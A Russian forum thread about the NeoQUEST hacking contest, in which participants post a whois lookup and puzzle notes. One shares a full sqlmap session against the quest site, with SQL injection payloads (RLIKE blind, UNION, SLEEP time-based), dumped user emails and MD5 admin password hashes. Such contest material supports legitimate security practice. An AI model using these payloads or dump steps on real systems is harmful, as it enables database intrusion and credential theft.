Рада (и горда) представить первый хак-квест этого года от нашей компании. Надеюсь, он покажется вам стоящим.
Компания «НеоБИТ» объявляет о начале регистрации участников хакквеста
NeoQUEST-2012
http://neoquest.ru/
Участникам хакквеста предстоит поломать голову над различными задачами информационной безопасности: защищенностью SCADA-систем, криптоанализом, стеганографией, безопасностью операционных систем Windows и Linux и дизассемблированием программ, заняться web hacking’ом и реверсным инжинирингом.
Не важно, является ли информационная безопасность вашей работой или хобби. Если вы способны перехитрить соперника, отыскав в его защите брешь, о которой он и не подозревает, то этот квест - для вас. Он позволит вам продемонстрировать свой уровень и получить море удовольствия от безнаказанного взлома.
Главный приз первого этапа нашего конкурса – ноутбук MacBook Pro.
Регистрация участников начинается 21 февраля 2012
Игра стартует 1 марта 2012
Вся информация о квесте и начало "легеды" - при регистрации
давайте поиграем
1 уровень
дают домен 178.250.245.27
надо найти инфу о типе
netnum: 178.250.244.0 - 178.250.245.255
netname: MAJORDOMO-NETWORK
descr: Saint-Petersburg department Majordomo Llc
country: RU
admin-c: MJDM-RIPE
tech-c: MJDM-RIPE
status: ASSIGNED PA
mnt-by: MNT-MAJORDOMO
remarks: INFRA-AW
source: RIPE # Filtered
role: MAJORDOMO.RU NOC
address: Torfyanaya doroga 7 lit F, of 1323
197342 Saint-Petersburg
Russia
phone: +7 812 3353545
phone: +7 495 7272278
fax-no: +7 812 3353545
fax-no: +7 495 7272278
abuse-mailbox:
admin-c: ALD2-RIPE
tech-c: ALD2-RIPE
nic-hdl: MJDM-RIPE
mnt-by: MNT-MAJORDOMO
source: RIPE # Filtered
route: 178.250.244.0/23
descr: Saint-Petersburg department Majordomo Llc
origin: AS43362
mnt-by: MNT-MAJORDOMO
source: RIPE # Filtered
route: 178.250.245.0/24
descr: Majordomo network
origin: AS43362
mnt-by: MNT-MAJORDOMO
source: RIPE # Filtered
нашел его, посадил в багажник, еду в подвал выбивать инфу
Root-access
03.03.2012, 18:52
Лолшто? Там вообще-то из бд данные надо вытащить.
Лолшто? Там вообще-то из бд данные надо вытащить.
я уже сделал
500 Internal Server Error
SilavoMne
11.03.2012, 02:13
жду квест..... уже 3й день....
жду квест..... уже 3й день....
Все ок, возвращаем квест! Свеженький, апдейтнутый.
Регистрационная форма - вот тут (http://neoquest.ru/regform/) , краткое описание правил и бонусов - в нашем блоге http://habrahabr.ru/company/neobit/blog/166513/
Приятного прохождения
NEOQUEST 2013neoquest.ru
И так что имеем имеем дамп БД к 1 задани
root@cloudbackup:~/sqlmap# python sqlmap.py -u "http://rosquest.ru/index.php?url=6"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting at 07:21:29
[07:21:29] [INFO] testing connection to the target url
[07:21:29] [INFO] heuristics detected web page charset 'ascii'
[07:21:29] [INFO] testing if the url is stable, wait a few seconds
[07:21:30] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[07:21:38] [INFO] testing if GET parameter 'url' is dynamic
[07:21:38] [WARNING] GET parameter 'url' does not appear dynamic
[07:21:38] [WARNING] reflective value(s) found and filtering out
[07:21:38] [INFO] heuristic (parsing) test shows that GET parameter 'url' might be injectable (possible DBMS: 'MySQL')
[07:21:38] [INFO] testing for SQL injection on GET parameter 'url'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] Y
[07:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:21:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:21:54] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[07:21:54] [INFO] GET parameter 'url' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[07:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[07:21:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[07:21:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[07:21:56] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[07:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:21:57] [INFO] testing 'MySQL inline queries'
[07:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:21:57] [INFO] testing 'MySQL 5.0.11 AND time-based blind'
[07:22:07] [INFO] GET parameter 'url' is 'MySQL > 5.0.11 AND time-based blind' injectable
[07:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:22:07] [INFO] automatically exten
07.02.13
[INFO] target url appears to have 2 columns in query
[07:22:08] [INFO] GET parameter 'url' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'url' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: url
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: url=6 RLIKE IF(4438=4438,6,0x28)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x 3a6d73703a)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: url=6 AND SLEEP(5)
---
[07:22:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[07:22:15] [INFO] fetched data logged to text files under 'output/rosquest.ru'
shutting down at 07:22:15
[07:25:03] [INFO] testing MySQL
[07:25:03] [WARNING] reflective value(s) found and filtering out
[07:25:03] [INFO] confirming MySQL
[07:25:03] [INFO] the back-end DBMS is MySQL
[07:25:03] [INFO] fetching banner
[07:25:03] [INFO] actively fingerprinting MySQL
[07:25:04] [INFO] executing MySQL comment injection fingerprint
web application technology: Nginx, PHP 5.3.10
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and 5.0.11 AND time-based blind
Payload: url=6 AND SLEEP(5)
---
[07:28:14] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[07:28:14] [INFO] fetching columns for table 'users' in database 'neoquest_web'
[07:28:15] [WARNING] reflective value(s) found and filtering out
[07:28:15] [INFO] the SQL query used returns 3 entries
[07:28:15] [INFO] retrieved: "id","int(11)"
[07:28:15] [INFO] retrieved: "email","varchar(40)"
[07:28:16] [INFO] retrieved: "role","varchar(50)"
[07:28:16] [INFO] fetching entries for table 'users' in database 'neoquest_web'
[07:28:16] [INFO] the SQL query used returns 10 entries
[07:28:16] [INFO] retrieved: "SemenPetrov@mail.ru","1","Manager"
[07:28:16] [INFO] retrieved: "PetrScheglov.2012@mail.ru","2","Admin"
[07:28:16] [INFO] retrieved: "HayoumaAzam@gmail.com","3","Admin"
[07:28:16] [INFO] retrieved: "OlgaIvanova@gmail.com","4","Accountant"
[07:28:17] [INFO] retrieved: "CourtneyKazembe.2012@gmail.com","5","Admin"
[07:28:17] [INFO] retrieved: "FlugenKohlmeier@hotmail.com","6","Admin"
[07:28:17] [INFO] retrieved: "KenShvartz@hotmail.com","7","User"
[07:28:17] [INFO] retrieved: "AnnaJokivirta@hotmail.com","8","Admin"
[07:28:17] [INFO] retrieved: "AlbertoIperti@hotmail.com","9","Admin"
[07:28:17] [INFO] retrieved: "KrisLezetc.2012@hotmail.com","10","Admin"
[07:28:17] [INFO] analyzing table dump for possible password hashes
Database: neoquest_web
Table: users
[10 entries]
+----+------------+--------------------------------+
| id | role | email |
+----+------------+--------------------------------+
| 1 | Manager | SemenPetrov@mail.ru |
| 2 | Admin | PetrScheglov.2012@mail.ru |
| 3 | Admin | HayoumaAzam@gmail.com |
| 4 | Accountant | OlgaIvanova@gmail.com |
| 5 | Admin | CourtneyKazembe.2012@gmail.com |
| 6 | Admin | FlugenKohlmeier@hotmail.com |
| 7 | User | KenShvartz@hotmail.com |
| 8 | Admin | AnnaJokivirta@hotmail.com |
| 9 | Admin | AlbertoIperti@hotmail.com |
| 10 | Admin | KrisLezetc.2012@hotmail.com |
+----+------------+--------------------------------+
[07:28:17] [INFO] table 'neoquest_web.users' dumped to CSV file 'output/rosquest.ru/dump/neoquest_web/users.csv'
[07:28:17] [INFO] fetched data logged to text files under 'output/rosquest.ru'
Я сделал это )))
Имеем почты всех кто есть в БД и их хеширвоаные пароли
[08:13:02] [INFO] fetching entries for table '94fhdi54g8rinnf5548581fjhgdt' in database 'neoquest_web'
[08:13:02] [INFO] the SQL query used returns 7 entries
[08:13:02] [INFO] retrieved: "CourtneyKazembe.2012@gmail.com","4f507829e3f2a72b4df9de064df76e69","1"
[08:13:02] [INFO] retrieved: "HayoumaAzam@gmail.com","ecb67dd66dd44f787c15d7d231402783","2"
[08:13:02] [INFO] retrieved: "PetrScheglov.2012@mail.ru","aefebf534eb346df845beb0d72a1fdde","3"
[08:13:02] [INFO] retrieved: "FlugenKohlmeier@hotmail.com","9de638c88a6e61d44fd29b6f48ef879b","4"
[08:13:02] [INFO] retrieved: "AnnaJokivirta@hotmail.com","50caceceaf185a26cad1ac0bb51fe6ad","5"
[08:13:03] [INFO] retrieved: "AlbertoIperti@hotmail.com","0e4a8027f7d9d9b03e01360cc43c26a9","6"
[08:13:03] [INFO] retrieved: "KrisLezetc.2012@hotmail.com","bb9030adff799137c670ca3080399542","7"
[08:13:03] [INFO] analyzing table dump for possible password hashes
[08:13:03] [INFO] recognized possible password hashes in column 'adm_pass'
Вот что имеем по поводу задания МР3 плеером
в начале при ускорении записи и обратном реверсе идет слово РАМ потом по средине азбука морзе в рассшифровке ГЕНАЕ потом в конце если разделить запись на каналы в правом канале слышна морзе ИНИ из этой несурядици должно выйти одно какоето осмысленное слово ответом которго будет хеш сумма МД5
и задание с сноубордистами
с пХЕШЕМ ну нарисовал правеьную картинку 8 на 8 сделал ее серой ка ктот ПХЕШ узнать? и что на скип пассе за циферки через # каким они боком?
Подключайтесь думаем вместе)
Добавлено спустя 9 минут 23 секунды:
Предположительно номер кредитки будет 4701-5959-2764-8440
Но сначала надо авторизироватся на сайте авиакомпании
Добавлено спустя 1 минуту 24 секунды:
РАМ потом идет азбука морзе [--.] [.] [-.] [..] [.] и вторая в правом канале звука [..] [-.] [..]
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot